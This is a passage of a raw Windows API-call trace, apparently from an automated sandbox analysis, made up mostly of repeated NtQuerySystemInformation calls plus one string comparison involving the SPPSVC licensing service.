ResultLength=0x0) [0272.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0272.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0272.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd010, Length=0x20, ResultLength=0x0) [0272.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0272.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0272.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdc0, Length=0x28, ResultLength=0x0) [0272.755] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0272.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0272.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x40, ResultLength=0x0) [0272.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 